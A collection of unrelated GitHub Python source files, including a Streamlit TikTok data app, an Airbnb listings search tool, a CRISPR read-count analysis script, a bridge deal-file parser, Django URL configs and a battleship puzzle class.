\",\n unsafe_allow_html=True)\nst.sidebar.markdown(\"The Tiktok Unofficial API has no search by hashtag api call available. The app is currently showing hardcoded data\")\n\n\n#Getting user input for hashtag\nhashtag = st.text_input('Search for a hashtag ', value=\"\")\n\n#Search button\nif st.button('Get Data'):\n    st.write('Received tiktok data on #'+hashtag)\n    call(['python', 'tiktok.py', hashtag]) \n    #Load in existing data to test it out\n    df = pd.read_csv('tiktokdata.csv') \n    \n    #Plotly visualization \n    fig = px.histogram(df, x='desc', hover_data=['desc'], y='stats_diggCount', height=300)\n    st.plotly_chart(fig, use_container_width=True)\n    \n    #Split columns\n    left_col, right_col = st.columns(2)\n    \n    #First chart - video stats\n    scatter1 = px.scatter(df, x='stats_shareCount', y='stats_commentCount', hover_data=['desc'], size='stats_playCount', color='stats_playCount')\n    left_col.plotly_chart(scatter1, use_container_width=True)\n    \n    #Second chart - video stats\n    scatter2 = px.scatter(df, x='author_nickname', y='authorStats_videoCount', hover_data=['author_signature'], size='authorStats_followerCount', color='authorStats_followerCount')\n    right_col.plotly_chart(scatter2, use_container_width=True)\n    \n    #Area graph\n    fig2 = px.area(df, x=\"video_duration\", y=\"stats_shareCount\", color=\"author_nickname\", line_group=\"author_nickname\")\n    st.plotly_chart(fig2, use_container_width=True)\n    \n    \n    \n    #Show tabular dataframe in streamlit (raw format)\n    df \n\n","repo_name":"Jayzeen/Tiktok-DataScience-App","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"}{"seq_id":"39921717524","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\n# Import Libraries\nimport csv\nimport os\nimport helpers\n\nHEADERS = ['host_id', 'name', 'description', 'host_name', 'host_since', 'host_location', 'host_response_time',\n           'host_response_rate', 'host_acceptance_rate', 'host_is_superhost', 'host_total_listings_count',\n           'host_verifications', 'host_identity_verified', 'property_type', 'room_type', 'accommodates',\n           'bathrooms_text', 'bedrooms', 'beds', 'amenities', 'price', 'minimum_nights', 'maximum_nights',\n           'instant_bookable', 'number_of_reviews', 'first_review', 'last_review', 'review_scores_rating',\n           'review_scores_accuracy', 'review_scores_cleanliness', 'review_scores_checkin',\n           'review_scores_communication', 'review_scores_location', 'review_scores_value']\n\ndef extract_file(file):\n    rows = []\n    with open(file, 'r') as file:\n        csv_reader = csv.DictReader(file)\n        for row in csv_reader:\n            rows.append(row)\n    global UPLOADED_FILE\n    UPLOADED_FILE = rows\n    \n\ndef search_by_hostID():\n    rows = UPLOADED_FILE\n    while True:\n        try:\n            host_id = int(input(\"Please input the host ID: \"))\n            break\n        except:\n            print(\"Ensure your input is an integer! 
\\n\")\n continue\n #finding the data by the specified host_id\n data = next((item for item in rows if item[\"host_id\"] == str(host_id)), None)\n \n if not data:\n print(f\"\\nNo listing found with 'host_id': {host_id}\")\n #returning the required data\n else:\n response = {}\n required_fields = [\"name\", \"host_name\", \"description\", \"host_location\", \"host_since\"]\n\n for i in required_fields:\n response[i]= data[i]\n \n print('--------------------------------------------------------------------------\\n')\n print(response, end='\\n')\n inquire_further_search()\n\ndef search_by_location():\n response = {}\n while True:\n try:\n input_location = str(input(\"Please input your desired location: \"))\n break\n except Exception as e:\n print(f\"Error: {e}\")\n\n #finding the data with the specified location\n all_data = []\n\n for item in UPLOADED_FILE:\n if str(item[\"host_location\"]) == input_location.capitalize():\n all_data.append(item)\n\n if len(all_data) > 0:\n #returning the required data\n\n while True:\n choose_to_specify = str(input(\"\\nDo you have specific fields you would like to return?(y/n): \"))\n if choose_to_specify.lower() == 'y':\n specify_fields = str(input(\"\\nInput specific fields (seperate by space only): \"))\n mod_specify_fields = [x.lower() for x in specify_fields.split()]\n if (all(x in HEADERS for x in mod_specify_fields) == False):\n print(f\"\\nWrong input. Available fields are: {', '.join(HEADERS)} \\n\")\n continue\n else:\n required_fields = mod_specify_fields\n break\n else:\n required_fields = [\"host_name\", \"property_type\", \"price\", \"minimum_nights\", \"maximum_nights\"]\n break\n if len(all_data) > 10:\n print('--------------------------------------------------------------------------\\n')\n for data in all_data[:10]:\n for i in required_fields:\n response[i] = data[i]\n print(response)\n print(f'... no. of responses = {len(all_data)}\\n')\n else:\n print('--------------------------------------------------------------------------\\n')\n for data in all_data:\n for i in required_fields:\n response[i] = data[i]\n print(response)\n inquire_further_search()\n \n else:\n\n all_locations = [ sub['host_location'] for sub in UPLOADED_FILE ]\n locations = set(all_locations)\n\n print(f\"\\nOops! No listing found for {input_location} \\n\")\n print(f\"The available locations are: {str(locations)} \\n\")\n\n while True:\n try_again = str(input(\"\\nWould you like to try another location? (y/n): \"))\n if try_again.lower() == 'y':\n search_by_location()\n elif try_again.lower() == 'n':\n print(\"Thank you! \\n\")\n break\n else:\n print(\"Invalid input! 
\n\")\n                continue\n            except Exception as e:\n                print(f\"Error: {e}\")\n                continue\n\n    inquire_further_search()\n\n\n# search by property type\ndef search_by_property_type():\n    while True:\n        try:\n            input_property_type = str(input(\"\\nPlease input your desired property type: \"))\n            break\n        except Exception as e:\n            print(f\"Error: {e}\")\n            continue\n\n    #finding the data with the specified property type\n    all_data = []\n    for item in UPLOADED_FILE:\n        if str(item[\"property_type\"]).lower() == input_property_type.lower():\n            all_data.append(item)\n\n    if len(all_data) > 0:\n        #returning the required data\n        response = {}\n        print('--------------------------------------------------------------------------\\n')\n\n        for data in all_data:\n            required_fields = [\"room_type\", \"accommodates\", \"bathrooms_text\", \"bedrooms\", \"beds\"]\n            for i in required_fields:\n                response[i] = data[i]\n            print(response, end=\"\\n\")\n        inquire_further_search()\n    else:\n        all_property_types = [ sub['property_type'] for sub in UPLOADED_FILE ]\n        property_types = set(all_property_types)\n\n        print(f\"\\nOops! No listing found for {input_property_type} \\n\")\n        print(f\"The available property types are: {str(property_types)} \\n\")\n\n        while True:\n            try_again = str(input(\"\\nWould you like to try another property type? (y/n): \"))\n            if try_again.lower() == 'y':\n                search_by_property_type()\n            elif try_again.lower() == 'n':\n                print(\"\\nThank you! \\n\")\n                break\n            else:\n                print(\"\\nInvalid input! \\n\")\n                continue\n\n        inquire_further_search()\n\n# Giving the user options to select from\ndef initialize_search():\n    print(\"\\nTo search by 'host_id', type '1'\")\n    print(\"To search by 'location', type '2'\")\n    print(\"To search by 'property type', type '3'\\n\")\n\n    search_param = int(input(\"Please input your desired search option: \"))\n\n    if search_param == 1:\n        search_by_hostID()\n\n    elif search_param == 2:\n        search_by_location()\n\n    elif search_param == 3:\n        search_by_property_type()\n\n    else:\n        print(\"\\nInvalid input! Try again\\n\")\n        initialize_search()\n\n# request further search; called after each query has been answered\ndef inquire_further_search():\n    while True:\n        try:\n            search_again = str(input(\"\\nWould you like to make another search? (y/n): \"))\n            if search_again.lower() == 'y':\n                initialize_search()\n            elif search_again.lower() == 'n':\n                print(f'\\nThank you!\\n')\n                while True:\n                    try:\n                        main_menu = str(input(\"Would you like to return to main menu? (y/n): \"))\n                        if main_menu.lower() == 'y':\n                            helpers.make_selection()\n                        elif main_menu.lower() == 'n':\n                            print(f'\\nThank you!\\n')\n                            os._exit(0)\n                        else:\n                            print(f'{main_menu} is an invalid input. Try again!')\n                            continue\n                    except Exception as e:\n                        print(f\"Error: {e}\")\n                        continue\n            else:\n                print(f'{search_again} is an invalid input. 
Try again!')\n                continue\n        except Exception as e:\n            print(f\"Error: {e}\")\n            continue\n\n","repo_name":"Gbolahan10/Data_Analytics_AirBnB","sub_path":"Process_Section_1.py","file_name":"Process_Section_1.py","file_ext":"py","file_size_in_byte":8127,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"}{"seq_id":"31115927024","text":"import random\n\ndef analyze_result():\n\n\n    result_file_path = '/home/ucar/catkin_test_ws/src/test/result.txt'\n    # define the plant and fruit name mappings\n    plant_type_map = {\n        'plant_cucumber': '黄瓜植株',\n        'plant_corn': '玉米植株',\n        'plant_wheat': '小麦植株',\n        'plant_rice': '水稻植株',\n    }\n    fruit_type_map = {\n        'fruit_corn': '玉米果实',\n        'fruit_watermelon': '西瓜果实',\n        'fruit_cucumber': '黄瓜果实',\n    }\n\n    # initialise the dictionaries that hold the tallies\n    room_plants = {}\n    fruit_counts = {}\n\n    # read result.txt and tally its contents\n    with open(result_file_path, 'r') as file:\n        lines = file.readlines()\n\n    # process each line and tally the plant types\n    for i, line in enumerate(lines):\n        # if the current line is empty, fall back to an unknown plant (resolved randomly below)\n        if not line.strip():\n            room_plants[f'Room_{i+1}'] = '未知植株'\n        else:\n            plant_types = line.strip().split(' ')\n            plant_counts = {plant_type: plant_types.count(plant_type) for plant_type in plant_types}\n            max_plant = max(plant_counts, key=plant_counts.get)\n            room_plants[f'Room_{i+1}'] = plant_type_map.get(max_plant, '未知植株')\n\n    # tally the fruit types\n    fruits = lines[3].strip().split(' ')\n    for fruit in fruits:\n        fruit_counts[fruit] = fruit_counts.get(fruit, 0) + 1\n\n    # find the most frequent fruit type and its count\n    max_fruit = max(fruit_counts, key=fruit_counts.get)\n    max_fruit_count = fruit_counts[max_fruit]\n\n    # randomly pick a plant that has not appeared yet to stand in for each unknown one\n    used_plants = set(room_plants.values())\n    unknown_plants = list(set(plant_type_map.values()) - used_plants)\n    for i, room in enumerate(room_plants):\n        if room_plants[room] == '未知植株':\n            if unknown_plants:\n                room_plants[room] = random.choice(unknown_plants)\n                
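                # remove the chosen plant so it cannot be assigned to another room as well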
unknown_plants.remove(room_plants[room])\n\n    # build the output string (the 'crop planted in area D' part is commented out)\n    result_string = \"任务完成B区域种植的作物为{}, C区域种植的作物为{}, E区域种植的作物为{}, F区域存放的果实为{}, 数量为{}个\".format(\n        room_plants['Room_1'],\n        room_plants['Room_2'],\n        room_plants['Room_3'],\n        # room_plants['Room_4'],\n        fruit_type_map.get(max_fruit, '未知果实'),\n        max_fruit_count\n    )\n\n    return result_string\n\nprint(analyze_result())","repo_name":"dioff/Niubility_xunfei","sub_path":"test/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":2521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"}{"seq_id":"24564068965","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 28 13:13:27 2016\n\n@author: philipp\n\"\"\"\n\n# Analyze count distribution\n# =======================================================================\n# Imports\nfrom __future__ import division # floating point division by default\nimport pandas as pd\nfrom Lorenz import gini\nimport yaml\nimport matplotlib\nmatplotlib.use('Agg') \nimport matplotlib.pyplot as plt\nfrom matplotlib import gridspec\nimport numpy\nimport os\nimport sys\nimport time\nimport warnings\nwarnings.simplefilter(action = \"ignore\", category = FutureWarning)\nfrom matplotlib.ticker import FuncFormatter\n\ndef kilos(x, pos):\n    return '%1.0fk' % (x*1e-3)\n\ndef kilos1(x, pos):\n    return '%1.1fk' % (x*1e-3)\n\ndef AnalyzeCounts(sample):\n    # ------------------------------------------------\n    # Print header\n    # ------------------------------------------------\n    print('++++++++++++++++++++++++++++++++++++++++++++++++') \n    start_total = time.time() \n\n    # ------------------------------------------------\n    # Get parameters\n    # ------------------------------------------------\n    configFile = open('configuration.yaml','r')\n    config = yaml.load(configFile)\n    configFile.close()\n    ScriptsDir = config['ScriptsDir'] \n    DataDir = config['DataDir']\n    AnalysisDir = config['AnalysisDir']\n    sgRNAReadCountDir = config['sgRNAReadCountDir']\n    GeneReadCountDir = config['GeneReadCountDir']\n    OutputDir = config['CountQCDir']+sample\n    res = config['dpi'] \n    svg = config['svg']\n    logfilename = sample+'_ReadCount_Statistics.txt'\n    \n    # --------------------------------------\n    # Load counts\n    # --------------------------------------\n    os.chdir(sgRNAReadCountDir)\n    colnames = ['ID','gene','counts']\n    GuideFileName = sample+'_GuideCounts_normalized.txt'\n    GuideFile = pd.read_table(GuideFileName, sep='\\t', names=colnames)\n    ReadsPerGuide = list(GuideFile['counts'])\n    L = len(ReadsPerGuide) \n    os.chdir(GeneReadCountDir)\n    colnames = ['gene','counts'] \n    GeneFileName = sample+'_GeneCounts_normalized.txt'\n    GeneFile = pd.read_table(GeneFileName, sep='\\t', names=colnames)\n    ReadsPerGene = list(GeneFile['counts'])\n    sgID = list(GuideFile['ID'].values) \n    gene = list(GuideFile['gene'].values) \n    if not os.path.exists(OutputDir):\n        os.makedirs(OutputDir)\n    os.chdir(OutputDir)\n\n    # --------------------------------------\n    # Lorenz Curve\n    # --------------------------------------\n    print('Computing Gini coefficients ... 
') \n GiniIndex_u,xu,yu = gini(ReadsPerGuide)\n GiniIndex_g,xg,yg = gini(ReadsPerGene)\n GiniIndex_u = round(GiniIndex_u*1000)/1000\n GiniIndex_g = round(GiniIndex_g*1000)/1000\n print('Gini Index (sgRNAs): ' + str(round(GiniIndex_u*1000)/1000))\n print('Gini Index (genes): ' + str(round(GiniIndex_g*1000)/1000))\n # Plot Lorenz curves\n print('Plotting Lorenz curves ...')\n plt.figure(figsize=(3,6))\n gs = gridspec.GridSpec(2, 1)\n ax0 = plt.subplot(gs[0])\n ax1 = plt.subplot(gs[1]) \n ax0.plot(xu,yu, linewidth=2, color='green') \n ax0.plot(xu,xu, '--', color='#dbdcdd')\n ax0.set_ylim([0,1]) \n ax0.set_xlabel('Cumulative Fraction of sgRNAs', fontsize=10)\n ax0.set_ylabel('Cumulative Fraction of Reads', fontsize=10)\n ax0.tick_params(labelsize=11)\n ax0.set_title('Read Count Inequality (sgRNAs)', fontsize=10)\n ax0.text(.05,.8,'Gini coefficient: '+str((round(GiniIndex_u*1000)/1000)),fontsize=9)\n ax1.plot(xg,yg, linewidth=2, color='blue') \n ax1.plot(xg,xg, '--', color='#dbdcdd')\n ax1.set_ylim([0,1])\n ax1.set_xlabel('Cumulative Fraction of Genes', fontsize=10) \n ax1.set_ylabel('Cumulative Fraction of Reads', fontsize=10)\n ax1.tick_params(labelsize=11)\n ax1.set_title('Read Count Inequality (Genes)', fontsize=10)\n ax1.text(.05,.8,'Gini coefficient: '+str((round(GiniIndex_g*1000)/1000)),fontsize=9) \n plt.tight_layout()\n plt.savefig(sample+'_LorenzCurves.png',dpi=res)\n if svg:\n plt.savefig(sample+'_LorenzCurves.svg') \n \n # --------------------------------------\n # Boxplots & Histograms\n # --------------------------------------\n fig = plt.figure(figsize=(6,5)) \n gs = gridspec.GridSpec(2, 2, width_ratios=[1, 2])\n ax0 = plt.subplot(gs[0])\n ax1 = plt.subplot(gs[1])\n ax2 = plt.subplot(gs[2])\n ax3 = plt.subplot(gs[3]) \n print('Generating boxplots...')\n # Reads per guide: Boxplot\n bp = ax0.boxplot(ReadsPerGuide, showfliers = False, patch_artist=True) # No outliers\n plt.setp(bp['boxes'], color='black')\n plt.setp(bp['medians'], color='red') \n plt.setp(bp['whiskers'], color='black')\n for patch in bp['boxes']:\n patch.set(facecolor='#92fcae') \n ax0.set_xticks([''])\n ax0.set_ylabel('Counts per sgRNA', fontsize=11)\n ax0.tick_params(labelsize=11)\n # Reads per gene: Boxplot\n bp = ax2.boxplot(ReadsPerGene, showfliers = False, patch_artist=True) # No outliers\n plt.setp(bp['boxes'], color='black')\n plt.setp(bp['medians'], color='red') \n plt.setp(bp['whiskers'], color='black')\n for patch in bp['boxes']:\n patch.set(facecolor='#9de4f9') \n ax2.set_xticks([''])\n ax2.set_ylabel('Counts per Gene', fontsize=11)\n ax2.tick_params(labelsize=11)\n print('Generating histograms...')\n # Reads per guide: Histogram\n ax1.set_title('EMPTY', color='white', fontsize=14)\n fig.text(.3,.95,'Read Distribution (sgRNAs)', fontsize=12)\n Counts_noFliers = list()\n max_count = max(40,int(numpy.percentile(ReadsPerGuide,99)))\n max_count = min(max_count,60) \n for count in ReadsPerGuide:\n if count <= max_count:\n Counts_noFliers.append(count)\n ax1.hist(Counts_noFliers, color='green', bins=range(max_count+2), align = 'left') \n ax1.set_xlabel('Counts per sgRNA', fontsize=11)\n ax1.set_ylabel('Number of sgRNAs', fontsize=11) \n ax1.tick_params(labelsize=11)\n formatter = FuncFormatter(kilos)\n ax1.yaxis.set_major_formatter(formatter)\n ax1.set_xlim([-10,max_count])\n # Reads per gene: Histogram\n ax3.set_title('EMPTY', color='white', fontsize=14)\n fig.text(.3,.47,'Read Distribution (Genes)', fontsize=12)\n Counts_noFliers = list()\n max_count = max(40,int(numpy.percentile(ReadsPerGene,99)))\n 
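    # additionally cap the histogram range at 120 so a few extreme gene counts do not stretch the x-axis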
max_count = min(max_count,120)\n for count in ReadsPerGene:\n if count <= max_count:\n Counts_noFliers.append(count)\n ax3.hist(Counts_noFliers, color='blue', bins=range(max_count+2), align = 'left')\n ax3.set_xlabel('Counts per Gene', fontsize=11)\n ax3.set_ylabel('Number of Genes', fontsize=11)\n ax3.tick_params(labelsize=11)\n formatter = FuncFormatter(kilos1)\n ax3.yaxis.set_major_formatter(formatter) \n ax3.set_xlim([-5,max_count])\n plt.tight_layout()\n plt.savefig(sample+'_ReadCount_Distribution.png',dpi=res)\n if svg:\n plt.savefig(sample+'_ReadCount_Distribution.svg') \n \n # --------------------------------------------\n # Counts distribution\n # --------------------------------------------\n print('Writing distribution file ... ')\n N_Guides = len(ReadsPerGuide)\n N_Genes = len(ReadsPerGene)\n guide_m = int(numpy.median(ReadsPerGuide))\n guide_sd = int(numpy.std(ReadsPerGuide))\n guide_q25 = int(numpy.percentile(ReadsPerGuide,25))\n guide_q75 = int(numpy.percentile(ReadsPerGuide,75))\n guide_min = int(min(ReadsPerGuide)) \n guide_max = int(max(ReadsPerGuide))\n guide_pres = [1 for n in ReadsPerGuide if n > 0]\n guide_pres = len(guide_pres)\n guide_pres100 = round((guide_pres/N_Guides)*1000)/10\n gene_m = int(numpy.median(ReadsPerGene))\n gene_sd = int(numpy.std(ReadsPerGene))\n gene_q25 = int(numpy.percentile(ReadsPerGene,25))\n gene_q75 = int(numpy.percentile(ReadsPerGene,75))\n gene_min = int(min(ReadsPerGene)) \n gene_max = int(max(ReadsPerGene))\n gene_pres = [1 for n in ReadsPerGene if n > 0]\n gene_pres = len(gene_pres)\n gene_pres100 = round((gene_pres/N_Genes)*1000)/10\n # Write log file\n LogFile = open(logfilename,'w') \n LogFile.write(sample+' Read Counts Distribution:\\n')\n LogFile.write('***********************************\\n')\n LogFile.write('\\n')\n LogFile.write('Read Counts per sgRNA (normalized)\\n') \n LogFile.write('------------------------------------\\n')\n LogFile.write('Median:\\t\\t\\t'+str(guide_m)+'\\n')\n LogFile.write('Standard Deviation:\\t'+str(guide_sd)+'\\n') \n LogFile.write('25% Quantile:\\t\\t'+str(guide_q25)+'\\n')\n LogFile.write('75% Quantile:\\t\\t'+str(guide_q75)+'\\n')\n LogFile.write('Minimum:\\t\\t'+str(guide_min)+'\\n')\n LogFile.write('Maximum:\\t\\t'+str(guide_max)+'\\n')\n LogFile.write('sgRNA Representation:\\t'+str(guide_pres)+' ('+str(guide_pres100)+'%)\\n')\n LogFile.write('Gini coefficient:\\t'+str(GiniIndex_u)+'\\n')\n LogFile.write('\\n')\n LogFile.write('Read Counts per Gene (normalized)\\n') \n LogFile.write('------------------------------------\\n')\n LogFile.write('Median:\\t\\t\\t'+str(gene_m)+'\\n')\n LogFile.write('Standard Deviation:\\t'+str(gene_sd)+'\\n') \n LogFile.write('25% Quantile:\\t\\t'+str(gene_q25)+'\\n')\n LogFile.write('75% Quantile:\\t\\t'+str(gene_q75)+'\\n')\n LogFile.write('Minimum:\\t\\t'+str(gene_min)+'\\n')\n LogFile.write('Maximum:\\t\\t'+str(gene_max)+'\\n')\n LogFile.write('Gene Representation:\\t'+str(gene_pres)+' ('+str(gene_pres100)+'%)\\n')\n LogFile.write('Gini coefficient:\\t'+str(GiniIndex_g)+'\\n') \n LogFile.close()\n\n # --------------------------------------\n # Final time stamp\n # -------------------------------------- \n os.chdir(ScriptsDir) \n end_total = time.time()\n # Final time stamp\n print('------------------------------------------------')\n print('Script completed.') \n sec_elapsed = end_total - start_total\n if sec_elapsed < 60:\n time_elapsed = sec_elapsed\n print('Time elapsed [secs]: ' + '%.3f' % time_elapsed +'\\n')\n elif sec_elapsed < 3600:\n time_elapsed = 
sec_elapsed/60\n        print('Time elapsed [mins]: ' + '%.3f' % time_elapsed +'\\n')\n    else:\n        time_elapsed = sec_elapsed/3600\n        print('Time elapsed [hours]: ' + '%.3f' % time_elapsed +'\\n') \n\n\nif __name__ == \"__main__\":\n    input1 = sys.argv[1]\n    AnalyzeCounts(input1)\n","repo_name":"LewisLabUCSD/PinAPL-Py","sub_path":"Scripts/AnalyzeReadCounts.py","file_name":"AnalyzeReadCounts.py","file_ext":"py","file_size_in_byte":10352,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"22"}{"seq_id":"43401304974","text":"import warnings\n\nfrom . import DealFormat\nfrom .. import dto\n\nclass DGEFormat(DealFormat):\n    number_warning = '.dge file format assumes consecutive deal numbers from 1'\n    suits = {\n        chr(6): dto.SUIT_SPADES,\n        chr(3): dto.SUIT_HEARTS,\n        chr(4): dto.SUIT_DIAMONDS,\n        chr(5): dto.SUIT_CLUBS\n    }\n\n    def suit_indicator(self, the_suit):\n        for indicator, suit in self.suits.items():\n            if suit == the_suit:\n                return indicator\n        return None\n\n    @property\n    def suffix(self):\n        return '.dge'\n\n    def parse_content(self, content):\n        warnings.warn(self.number_warning)\n        dealset = []\n        number = 1\n        while True:\n            deal_str = content.read(128).strip()\n            if len(deal_str) > 0:\n                if len(deal_str) < 68:\n                    warnings.warn('truncated .dge input: %s' % (deal_str))\n                    break\n                else:\n                    deal = dto.Deal()\n                    deal.number = number\n                    deal.dealer = deal.get_dealer(number)\n                    deal.vulnerable = deal.get_vulnerability(number)\n                    deal.hands = self.parse_hands(deal_str[0:68])\n                    dealset.append(deal)\n                    number += 1\n            else:\n                break\n        return dealset\n\n    def parse_hands(self, deal_str):\n        deal = dto.Deal()\n        hand = 0\n        suit_count = -1\n        suit = None\n        for char in deal_str[0:68]:\n            if char in self.suits:\n                suit = self.suits[char]\n                suit_count += 1\n                if suit_count == 4:\n                    suit_count = 0\n                    hand += 1\n            else:\n                if suit is None:\n                    raise RuntimeError('invalid .dge line: %s' % (deal_str))\n                else:\n                    deal.hands[hand][suit].append(char)\n        return deal.hands\n\n    def output_content(self, out_file, dealset):\n        warnings.warn(self.number_warning)\n        for deal in dealset:\n            deal_str = self.single_deal_output(deal)\n            deal_str += chr(0) * 60\n            out_file.write(deal_str)\n\n    def single_deal_output(self, deal):\n        deal_str = ''\n        for hand in deal.hands:\n            for suit, cards in enumerate(hand):\n                deal_str += self.suit_indicator(suit)\n                deal_str += ''.join(cards)\n        return deal_str\n","repo_name":"emkael/deal-convert","sub_path":"dealconvert/formats/dge.py","file_name":"dge.py","file_ext":"py","file_size_in_byte":2467,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"22"}{"seq_id":"71242142777","text":"from django.conf.urls import patterns, url\n\n__author__ = 'Dimas Ciputra '\n__date__ = '07/09/16'\n\nurlpatterns = patterns(\n    \"clients.views\",\n    url(\"^client/(?P.*)/$\",\n        \"client_detail\",\n        name=\"client_detail\"),\n    url(\"^all/$\",\n        \"get_all_clients\",\n        name=\"get_all_clients\")\n)\n","repo_name":"kartoza/docker-mezzanine","sub_path":"django_project/clients/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"22"}{"seq_id":"4190673393","text":"def coins(x):\n    #Prints the number of US coins (quarters, dimes, nickels, pennies) needed\n    cents = x\n    quarternum = 0\n    dimenum = 0\n    nicklenum = 0\n    pennynum = 0 #work from the largest coin down, subtracting its value while it still fits\n    total = 0\n\n    
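    # greedy change-making: take as many of each coin as fit, starting with the largest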
quarternum, cents = divmod(cents, 25)   # quarters\n    dimenum, cents = divmod(cents, 10)      # dimes\n    nicklenum, cents = divmod(cents, 5)     # nickels (original variable name kept)\n    pennynum = cents                        # pennies are whatever is left\n\n    total = quarternum + dimenum + nicklenum + pennynum\n\n    return total","repo_name":"enderquestral/Reed-CSCI121","sub_path":"Week2/coins.py","file_name":"coins.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"}
{"seq_id":"40256256592","text":"# -*- coding: utf-8 -*-\n\nfrom django.urls import path\n\nfrom cast.views import (\n    SearchView, PodcastDetailView, PodcastAboutView,\n    PodcastMonthArchiveView, uplike\n    )\n\nfrom cast.models import Podcast\n\napp_name = 'cast'\n\nurlpatterns = [\n    path('search/', SearchView.as_view(), name='search'),\n    path('p///', PodcastDetailView.as_view(), name='podcast'),\n    path('p///like/', uplike, name='uplike'),\n    path('p/archive///', PodcastMonthArchiveView.as_view(), name='archive_month'),\n    path('about/', PodcastAboutView.as_view(), name='about'),\n]\n","repo_name":"flavien-hugs/podcast-gbekefm","sub_path":"cast/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"}
{"seq_id":"37344611356","text":"from enum import Enum\nimport colorama\nfrom colorama import Fore, Back, Style\n\nclass FieldType(Enum):\n    empty = 1\n    water = 2\n    ship = 3\n\nclass ShipOrientation(Enum):\n    unknown = 0\n    none = 1\n    north = 2\n    south = 3\n    east = 4\n    west = 5\n    both = 6\n\nclass Field(object):\n    def __init__(self):\n        self.__fixed = False\n        self.__type = FieldType.empty\n        self.__marked_type = FieldType.empty\n        self.__orientation = ShipOrientation.none\n\n    @property\n    def marked_type(self):\n        return self.__type if self.__fixed else self.__marked_type\n\n    def set_fixed(self, typ=None, orientation=ShipOrientation.unknown):\n        self.__fixed = True\n\n        if typ is not None:\n            self.__type = typ\n            self.__marked_type = typ\n            self.__orientation = orientation\n\n    def __str__(self):\n        typ = self.__type if self.__fixed else self.__marked_type\n\n        if typ == FieldType.empty:\n            return '  '\n        elif typ == FieldType.water:\n            return '~~'\n        elif typ == FieldType.ship:\n            if self.__orientation == ShipOrientation.unknown:\n                return '??'\n            elif self.__orientation == ShipOrientation.none:\n                return '<>'\n            elif self.__orientation == ShipOrientation.north:\n                return '^^'\n            elif self.__orientation == ShipOrientation.south:\n                return 'vv'\n            elif self.__orientation == ShipOrientation.west:\n                return ' <'\n            elif self.__orientation == ShipOrientation.east:\n                return '> '\n            elif self.__orientation == ShipOrientation.both:\n                return 'XX'\n\n    def set_type(self, typ, orientation=ShipOrientation.unknown):\n        self.__type = typ\n        self.__orientation = orientation\n
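\n    def set_marked_type(self, typ):\n        # Added helper (an assumption, not in the original file): Table below\n        # needs a public way to record player marks, because the\n        # double-underscore attribute is name-mangled and cannot be assigned\n        # from outside this class.\n        self.__marked_type = typ\n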
\nclass Table(object):\n    def __init__(self, width, height):\n        self.__fields = []\n        self.__width = width\n        self.__height = height\n        self.__col_counts = []\n        self.__row_counts = []\n        self.__ships = []\n\n        for count in range(0, height):\n            self.__fields.append([])\n            self.__row_counts.append(0)\n\n        for count in range(0, width):\n            self.__col_counts.append(0)\n\n            # Nested under the width loop so every row receives one Field\n            # per column, giving a full width x height grid.\n            for row in range(0, height):\n                self.__fields[row].append(Field())\n\n        self.clean()\n\n    @property\n    def width(self):\n        return self.__width\n\n    @property\n    def height(self):\n        return self.__height\n\n    def __check_height(self, row):\n        if row not in range(0, self.__height):\n            raise IndexError(\"Invalid row number\")\n\n    def __check_width(self, col):\n        if col not in range(0, self.__width):\n            raise IndexError(\"Invalid column number\")\n\n    def row(self, row):\n        self.__check_height(row)\n\n        # TODO: This doesn’t feel right\n        return self.__fields[row]\n\n    def col(self, col):\n        self.__check_width(col)\n\n        # TODO: This doesn’t feel right\n        return [f[col] for f in self.__fields]\n\n    def __field(self, row, col):\n        # Returns None for out-of-range coordinates so callers can mark\n        # neighbours without doing their own bounds checks.\n        if row in range(0, self.__height) and col in range(0, self.__width):\n            return self.__fields[row][col]\n        return None\n\n    def clean(self):\n        # Reset the hidden layout to open water; fields start out unmarked\n        # and unrevealed, and only set_fixed() reveals them.\n        for row in self.__fields:\n            for field in row:\n                field.set_type(FieldType.water)\n                field.set_marked_type(FieldType.empty)\n\n    def __check_collision(self, parts):\n        pass\n\n    def add_ship(self, start_row, start_col, length, vertical):\n        row, col = start_row - 1, start_col - 1\n        parts = []\n\n        for i in range(0, length):\n            parts.append((row, col))\n\n            if vertical:\n                row += 1\n            else:\n                col += 1\n\n        count = 0\n\n        for row, col in parts:\n            count += 1\n            orientation = ShipOrientation.unknown\n\n            if length == 1:\n                orientation = ShipOrientation.none\n            else:\n                if count == 1:\n                    orientation = ShipOrientation.north if vertical \\\n                        else ShipOrientation.west\n                elif count == length:\n                    orientation = ShipOrientation.south if vertical \\\n                        else ShipOrientation.east\n                else:\n                    orientation = ShipOrientation.both\n\n            self.__fields[row][col].set_type(FieldType.ship,\n                                             orientation=orientation)\n\n    def reveal(self, row, col):\n        self.__fields[row - 1][col - 1].set_fixed()\n\n    def reveal_all(self):\n        for row in self.__fields:\n            for field in row:\n                field.set_fixed()\n\n    @property\n    def solved(self):\n        # Check if all fields have been marked\n        for row in self.__fields:\n            for field in row:\n                if field.marked_type == FieldType.empty:\n                    return False\n\n        # TODO: Check if marked ships are placed sanely\n        # TODO: Check if side-numbers equal the number of marked ship-parts\n\n        return True\n\n    def mark(self, row, col, typ):\n        field = self.__field(row, col)\n\n        if field is not None:\n            field.set_marked_type(typ)\n\n    def is_ship(self, row, col):\n        return self.__fields[row][col].marked_type == FieldType.ship\n\n    def __str__(self):\n        def divider():\n            ret = '+'\n\n            for i in range(0, self.__width):\n                ret += '--+'\n\n            ret += \"\\n\"\n\n            return ret\n\n        ret = divider()\n\n        for row in 